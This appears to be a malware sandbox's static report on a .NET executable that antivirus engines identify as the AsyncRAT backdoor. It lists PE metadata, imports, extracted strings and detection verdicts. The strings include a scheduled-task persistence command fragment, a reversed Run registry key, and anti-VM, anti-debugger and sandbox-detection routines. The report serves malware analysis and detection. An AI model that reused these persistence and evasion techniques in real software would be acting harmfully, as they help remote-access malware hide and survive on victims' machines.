Static | ZeroBOX

PE Compile Time

2021-03-27 22:04:14

PE Imphash

f34d5f2d4577ed6d9ceec516c1f5a744

Sections

| Name | Virtual Address | Virtual Size | Size of Raw Data | Entropy |
|---|---|---|---|---|
| .text | 0x00002000 | 0x002086b4 | 0x00208800 | 6.30282056919 |
| .rsrc | 0x0020c000 | 0x000007e4 | 0x00000800 | 4.80851479527 |
| .reloc | 0x0020e000 | 0x0000000c | 0x00000200 | 0.101910425663 |

Resources

| Name | Offset | Size | Language | Sub-language | File type |
|---|---|---|---|---|---|
| RT_VERSION | 0x0020c0a0 | 0x000002cc | LANG_NEUTRAL | SUBLANG_NEUTRAL | data |
| RT_MANIFEST | 0x0020c36c | 0x00000478 | LANG_NEUTRAL | SUBLANG_NEUTRAL | exported SGML document, UTF-8 Unicode (with BOM) text |

Imports

Library mscoree.dll:
0x402000 _CorExeMain

!This program cannot be run in DOS mode.
`.rsrc
@.reloc
v4.0.30319
#Strings
Action`10
<>9__1_0
<RandomString>b__1_0
<>p__0
Nullable`1
IEnumerable`1
CallSite`1
List`1
__StaticArrayInitTypeSize=32
Microsoft.Win32
ToUInt32
ToInt32
SwapInt32
<>o__2
Func`2
X509Certificate2
WriteUInt64
ToUInt64
GetAsUInt64
SetAsUInt64
ToInt64
SwapInt64
ToUInt16
ToInt16
SwapInt16
HMACSHA256
Sha256
Aes256
aes256
__StaticArrayInitTypeSize=6
get_UTF8
<Module>
MessagePackLib.<PrivateImplementationDetails>
ES_SYSTEM_REQUIRED
ES_DISPLAY_REQUIRED
MapNameToOID
get_FormatID
EXECUTION_STATE
get_ASCII
System.IO
ES_CONTINUOUS
get_IV
set_IV
GenerateIV
value__
xsVnUIKdsKJSCOiWxCDfQa
DNgMgCVmAba
cSQAnAEOPyda
ReadServertData
mscorlib
System.Collections.Generic
Microsoft.VisualBasic
get_SendSync
EndRead
BeginRead
Thread
InnerAdd
SHA256Managed
get_Connected
get_IsConnected
set_IsConnected
Received
kNLeKEkKOwVdxgfd
get_Guid
MZjRHRwHLBkVUHuJVqSGNuajd
<SendSync>k__BackingField
<IsConnected>k__BackingField
<KeepAlive>k__BackingField
<HeaderSize>k__BackingField
<Ping>k__BackingField
<ActivatePong>k__BackingField
<Interval>k__BackingField
<Buffer>k__BackingField
<Offset>k__BackingField
<SslClient>k__BackingField
<TcpClient>k__BackingField
InnerAddMapChild
InnerAddArrayChild
EgkZxowywFQiamAcZbuitplNmd
Append
RegistryValueKind
PQBbjjVSjdmayzkbagqd
Replace
CreateInstance
set_Mode
FileMode
PaddingMode
EnterDebugMode
CryptoStreamMode
CompressionMode
CipherMode
SelectMode
utf8Encode
DeleteSubKeyTree
get_Message
DetectSandboxie
Invoke
IEnumerable
IDisposable
ToDouble
SwapDouble
get_Handle
RuntimeFieldHandle
GetModuleHandle
RuntimeTypeHandle
GetTypeFromHandle
WaitHandle
WriteSingle
ToSingle
SetAsSingle
InstallFile
DecodeFromFile
SaveBytesToFile
IsInRole
WindowsBuiltInRole
Console
GetActiveWindowTitle
get_MainModule
ProcessModule
set_WindowStyle
ProcessWindowStyle
get_Name
get_FileName
set_FileName
GetTempFileName
GetFileName
fileName
lpModuleName
get_MachineName
get_OSFullName
get_FullName
IsValidDomainName
get_UserName
lowerName
SetName
CheckHostName
DateTime
get_LastWriteTime
ToUniversalTime
ReadLine
WriteLine
Combine
OxCcuCloe
ZlPCJUGWpe
UriHostNameType
get_ValueType
valueType
MsgPackType
ProtocolType
GetType
SocketType
FileShare
System.Core
Serversignature
Dispose
StrReverse
X509Certificate
ValidateServerCertificate
certificate
Truncate
Create
SetThreadExecutionState
Delete
CallSite
CompilerGeneratedAttribute
DebuggableAttribute
ComVisibleAttribute
AssemblyTitleAttribute
AssemblyTrademarkAttribute
TargetFrameworkAttribute
AssemblyFileVersionAttribute
AssemblyConfigurationAttribute
AssemblyDescriptionAttribute
DefaultMemberAttribute
CompilationRelaxationsAttribute
AssemblyProductAttribute
AssemblyCopyrightAttribute
AssemblyCompanyAttribute
RuntimeCompatibilityAttribute
set_UseShellExecute
ReadByte
WriteByte
DeleteValue
innerValue
get_HasValue
GetValue
SetValue
get_KeepAlive
set_KeepAlive
Remove
zVDycWBRgcFEURMXwKcLcwe
$VIP.exe
set_BlockSize
get_TotalSize
get_HeaderSize
set_HeaderSize
set_SendBufferSize
set_ReceiveBufferSize
set_KeySize
IndexOf
strFlag
IZGNQmsETnVBxLfg
KDWeWBdEGFgwsWCWsZKBKlVGwNcfg
AsdAqweFghZxcvBnmFGhRTyrErIeitegfletdfEfdsfdshg
CryptoConfig
PMyNjQOEVsPmpYdfHtUgoEpfmjmg
get_Ping
set_Ping
System.Threading
set_Padding
add_SessionEnding
SystemEvents_SessionEnding
MidpointRounding
UTF8Encoding
System.Drawing.Imaging
Ceiling
System.Runtime.Versioning
FromBase64String
ToBase64String
ReadString
DownloadString
WriteString
RandomString
ToString
get_AsString
set_AsString
BytesAsString
GetAsString
SetAsString
GetString
BytesAsHexString
Substring
System.Drawing
get_ActivatePong
set_ActivatePong
LFoCCAaAiTEsKBfOoQog
set_ErrorDialog
ComputeHash
strToHash
GetHash
VerifyHash
iWtNfysh
oFVYRSTHWwIfDjbYjhzJsOth
get_ExecutablePath
GetTempPath
rsmath
HmacSha256Length
get_Length
IvLength
AuthKeyLength
length
msgpackObj
listObj
MessagePackLib.MessagePack
MsgPack
AsyncCallback
RemoteCertificateValidationCallback
TimerCallback
unpack_msgpack
RegistryKeyPermissionCheck
FlushFinalBlock
ofFLLcPkRpyeQKlwyfk
HnGKLyCKeSNWMQxDZpBDqk
bXwgtIxkaByBAVzkxbcWGyGTbsk
IsSmallDisk
pPpoiKQNPVtSzqoApnpyKFASSwk
ULbWiyuFl
YCYsMgUMpwqCFPKpMgZkcfZRl
strVal
RtlSetProcessIsCritical
NetworkCredential
System.Security.Principal
WindowsPrincipal
AreEqual
get_Interval
set_Interval
AyFhcl
jTgGtcl
XLRJwogZAVaVKhfjRDhl
Install
kernel32.dll
user32.dll
ntdll.dll
WriteNull
SetAsNull
MutexControl
Encode2Stream
FileStream
NetworkStream
SslStream
DecodeFromStream
CryptoStream
GZipStream
MemoryStream
dproblem
trilangeproblem
get_Item
get_Is64BitOperatingSystem
ZMHxomMxTFpncgm
SymmetricAlgorithm
AsymmetricAlgorithm
HashAlgorithm
PyZbeuddbRtofaTJiOddTJxkm
Random
_random
sgetrandom
rafndom
rarfndom
fMutMRqm
ICryptoTransform
bmjeZzjHmVtm
MsgPackEnum
lyuOTCaWxAYHEBVjkEWwxym
PDRMLONCwFpuFQgJNHBtdnTtIn
efwtMVVwhBfFxZHmyGEySkOn
XMERXqctOxpkAJQMScgXn
WriteBoolean
ToBoolean
SetAsBoolean
QiCVgToan
HwidGen
children
iXanfzqxFcAEfn
X509Chain
AppDomain
get_CurrentDomain
Pastebin
IsAdmin
xAghljjTxJoggPHiXOxcMoln
ElXolJguVYDUWTNFZRiWMJnn
GetFileNameWithoutExtension
get_OSVersion
System.IO.Compression
Application
System.Security.Authentication
System.Reflection
X509CertificateCollection
ManagementObjectCollection
set_Position
position
CryptographicException
ArgumentNullException
ArgumentException
jFUzUApxUtn
Unknown
ImageCodecInfo
SendInfo
FileInfo
DriveInfo
FileSystemInfo
ComputerInfo
CSharpArgumentInfo
ProcessStartInfo
ConsoleKeyInfo
QdKojdQmXYiLqfo
xgetalaho
mjgFmZPsZzGuiwwVSmmiio
hDglKByXiwilPsAgJzGjapXBojo
fhello
WriteMap
MomAEXnbp
PreventSleep
etRFRSNqHQKdXCAPwzGaHliQCqfp
JdNLOFbcMXdsVblhyZVVdlp
JkysuZOEqxLHdgjnp
currentApp
mXKhbyCKtVNguDdPYTzEQRWqwqp
Microsoft.CSharp
System.Linq
JIQbuMCYwhPgSbLecpq
PEODLkVYMtpq
lyXuMhxq
SBuuQoUxQxpKWLpJmUqxq
IdYuvar
InvokeMember
GetRandomNumber
MD5CryptoServiceProvider
RSACryptoServiceProvider
AesCryptoServiceProvider
StringBuilder
InstallFolder
IdSender
sender
Microsoft.CSharp.RuntimeBinder
CallSiteBinder
IEEERemainder
GetEncoder
get_Buffer
set_Buffer
WriteInteger
get_AsInteger
set_AsInteger
GetAsInteger
SetAsInteger
DetectDebugger
ManagementObjectSearcher
SessionEndingEventHandler
IdBanner
ToUpper
DetectManufacturer
CurrentUser
StreamWriter
TextWriter
BitConverter
ToLower
IEnumerator
ManagementObjectEnumerator
System.Collections.IEnumerable.GetEnumerator
Activator
.cctor
Monitor
CreateDecryptor
CreateEncryptor
IntPtr
System.Diagnostics
ChWKds
NativeMethods
Microsoft.VisualBasic.Devices
System.Runtime.InteropServices
System.Runtime.CompilerServices
DebuggingModes
ExpandEnvironmentVariables
GetProcesses
GetHostAddresses
System.Security.Cryptography.X509Certificates
Encode2Bytes
GetUtf8Bytes
utf8Bytes
Rfc2898DeriveBytes
ReadAllBytes
DecodeFromBytes
SwapBytes
LoadFileAsBytes
GetAsBytes
SetAsBytes
GetBytes
rawBytes
CIICVpOUQgs
CSharpArgumentInfoFlags
CSharpBinderFlags
esFlags
Strings
InitializeSettings
SessionEndingEventArgs
CasiYSFQkDSXsbNfRuQPwLjBAhs
RunAntiAnalysis
UCCuuaNhofamsxsdBjs
ICredentials
set_Credentials
Equals
zoMKdqXUoybIBMLgKVHaMasTWZnls
SslProtocols
ReadTools
WriteTools
BytesTools
System.Windows.Forms
Contains
System.Collections
StringSplitOptions
get_Chars
GetImageDecoders
RuntimeHelpers
SslPolicyErrors
sslPolicyErrors
FileAccess
hProcess
GetCurrentProcess
IPAddress
Compress
Decompress
System.Net.Sockets
set_Arguments
SystemEvents
Exists
Antivirus
AsdAqweFghZxcvBnmFGhRTyrErIeitegfletdfEfdsfdshg.
DORdckYiVKAFRCbJeEIYEIblNzBt
qYRoLAnWKUIAPXYPMt
HlntktNEHmZCMonbJiSTjsuRt
Concat
Repeat
ImageFormat
format
WriteFloat
get_AsFloat
set_AsFloat
GetAsFloat
SetAsFloat
FindObject
ManagementBaseObject
ForcePathObject
Select
Collect
Connect
Reconnect
System.Net
Target
KeepAlivePacket
Socket
System.Collections.IEnumerator.Reset
get_Offset
set_Offset
pOlIRFpKpNfHegt
ClientOnExit
zBnkGwZGGPMLkdFyAScTJkt
yfNVtUpFqnbGoGFcyHUpxutoOlt
GetValueOrDefault
IAsyncResult
DialogResult
ToUpperInvariant
WebClient
InitializeClient
get_SslClient
set_SslClient
get_TcpClient
set_TcpClient
AuthenticateAsClient
System.Management
Environment
parent
System.Collections.IEnumerator.Current
System.Collections.IEnumerator.get_Current
GetCurrent
CheckRemoteDebuggerPresent
isDebuggerPresent
get_RemoteEndPoint
get_Count
get_ProcessorCount
GetPathRoot
Decrypt
Encrypt
KKdhUsOMezFiOTAgUhmgbSpeLBFqt
ParameterizedThreadStart
Convert
FailFast
ToList
xgettt
System.Collections.IEnumerator.MoveNext
System.Text
GetWindowText
GetForegroundWindow
set_CreateNoWindow
CloseMutex
CreateMutex
gPhbgx
MessageBox
WirteArray
InitializeArray
MsgPackArray
ToArray
get_AsArray
refAsArray
VsYoby
qGaaEiaBAkBEkchNhBbLEAYXBey
get_Key
set_Key
CreateSubKey
DeleteSubKey
OpenSubKey
get_PublicKey
ReadKey
_authKey
masterKey
RegistryKey
sfJdjgsxkBSCghfTQQTDVOSqmXfy
System.Security.Cryptography
ReuRYHiHnlnYnTEzpxYoiy
Assembly
AddressFamily
BlockCopy
WriteBinary
ToBinary
get_SystemDirectory
SetRegistry
op_Equality
op_Inequality
System.Net.Security
WindowsIdentity
IsNullOrEmpty
WrapNonExceptionThrows
1.0.0.0
).NETFramework,Version=v4.0,Profile=Client
FrameworkDisplayName.NET Framework 4 Client Profile
_CorExeMain
mscoree.dll
<assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0">
<trustInfo xmlns="urn:schemas-microsoft-com:asm.v2">
<security>
<requestedPrivileges>
<requestedExecutionLevel level="asInvoker" uiAccess="false" />
</requestedPrivileges>
</security>
</trustInfo>
<compatibility xmlns="urn:schemas-microsoft-com:compatibility.v1">
<application>
<!-- Windows Vista -->
<supportedOS Id="{e2011457-1546-43c5-a5fe-008deee3d3f0}"/>
<!-- Windows 7 -->
<supportedOS Id="{35138b9a-5d96-4fbd-8e2d-a2440225f93a}"/>
<!-- Windows 8 -->
<supportedOS Id="{4a2f28e3-53b9-4441-ba9c-d69d4a4a6e38}"/>
<!-- Windows 8.1 -->
<supportedOS Id="{1f676c76-80e1-4239-95bb-83d0f6d0da78}"/>
<!-- Windows 10 -->
<supportedOS Id="{8e0f7a12-bfb3-4fe8-b9a5-48fd50a15a9a}"/>
</application>
</compatibility>
<asmv3:application xmlns:asmv3="urn:schemas-microsoft-com:asm.v3" >
<asmv3:windowsSettings xmlns="http://schemas.microsoft.com/SMI/2005/WindowsSettings">
<dpiAware>true</dpiAware>
</asmv3:windowsSettings>
</asmv3:application>
</assembly>
tsvu{z
SHA256
%AppData%
Packet
Message
/c schtasks /create /f /sc onlogon /rl highest /tn "
" /tr '"
"' & exit
\nuR\noisreVtnerruC\swodniW\tfosorciM\erawtfoS
@echo off
timeout 3 > NUL
START "" "
" /f /q
Select * from Win32_ComputerSystem
Manufacturer
microsoft corporation
VIRTUAL
vmware
VirtualBox
SbieDll.dll
Err HWID
ABCDEFGHIJKLMNOPQRSTUVWXYZ0123456
ABCDEFGHIJKLMNOPQRSTUVWXYZ012345
ClientInfo
Microsoft
Version
Performance
Pastebin
Antivirus
Installed
\root\SecurityCenter2
Select * from AntivirusProduct
displayName
Software\
plugin
savePlugin
sendPlugin
Hashes
Plugin.Plugin
Msgpack
Received
masterKey can not be null or empty.
input can not be null.
Invalid message authentication code (MAC).
{0:D3}
{0:X2}
(never used) type $c1
(ext8,ext16,ex32) type $c7,$c8,$c9
VS_VERSION_INFO
VarFileInfo
Translation
StringFileInfo
000004b0
Comments
CompanyName
FileDescription
FileVersion
1.0.0.0
InternalName
Boing.exe
LegalCopyright
LegalTrademarks
OriginalFilename
Boing.exe
ProductName
ProductVersion
1.0.0.0
Assembly Version
1.0.0.0
Antivirus Signature
Bkav Clean
Elastic malicious (high confidence)
MicroWorld-eScan Trojan.GenericKD.36605901
FireEye Generic.mg.d2be9aab83d33052
CAT-QuickHeal Clean
ALYac Trojan.GenericKD.36605901
Cylance Unsafe
VIPRE Trojan.Win32.Generic!BT
Sangfor Trojan.Win32.Save.a
K7AntiVirus Trojan ( 0055e1351 )
BitDefender Trojan.GenericKD.36605901
K7GW Trojan ( 0055e1351 )
CrowdStrike win/malicious_confidence_100% (W)
Arcabit Trojan.Generic.D22E8FCD
BitDefenderTheta Gen:NN.ZemsilF.34670.co0@aCfV@ib
Cyren W32/MSIL_Agent.BTI.gen!Eldorado
Symantec ML.Attribute.HighConfidence
ESET-NOD32 a variant of MSIL/Agent.CFW
APEX Malicious
Avast Win32:DropperX-gen [Drp]
ClamAV Win.Packed.Razy-9625918-0
Kaspersky HEUR:Backdoor.MSIL.Crysan.gen
Alibaba Backdoor:MSIL/AsyncRAT.b924e8e2
NANO-Antivirus Clean
ViRobot Clean
AegisLab Clean
Rising Trojan.AntiVM!1.CF63 (CLOUD)
Ad-Aware Trojan.GenericKD.36605901
Emsisoft Trojan.GenericKD.36605901 (B)
Baidu Clean
F-Secure Clean
DrWeb BackDoor.AsyncRATNET.1
Zillya Trojan.Agent.Win32.1907040
TrendMicro TROJ_GEN.R002C0DCT21
McAfee-GW-Edition BehavesLike.Win32.Generic.vh
CMC Clean
Sophos Generic ML PUA (PUA)
Ikarus Trojan.MSIL.Agent
Jiangmin Clean
MaxSecure Trojan.Malware.74418669.susgen
Avira HEUR/AGEN.1121262
MAX malware (ai score=86)
Antiy-AVL Clean
Kingsoft Clean
Gridinsoft Clean
Microsoft Backdoor:MSIL/AsyncRAT.GG!MTB
SUPERAntiSpyware Clean
ZoneAlarm Clean
GData Trojan.GenericKD.36605901
Cynet Malicious (score: 100)
AhnLab-V3 Malware/Win32.RL_Generic.C4139220
Acronis Clean
McAfee Fareit-FZT!D2BE9AAB83D3
TACHYON Clean
VBA32 TScope.Trojan.MSIL
Malwarebytes Backdoor.AsyncRAT.MSIL.Generic
Panda Trj/GdSda.A
Zoner Clean
TrendMicro-HouseCall TROJ_GEN.R002C0DCT21
Tencent Clean
Yandex Clean
SentinelOne Static AI - Malicious PE
eGambit Unsafe.AI_Score_99%
Fortinet MSIL/Agent.CFQ!tr
Webroot Clean
AVG Win32:DropperX-gen [Drp]
Cybereason malicious.b83d33
Paloalto generic.ml
Qihoo-360 Win32/Backdoor.AsyncRAT.HwMAPaQA
No IRMA results available.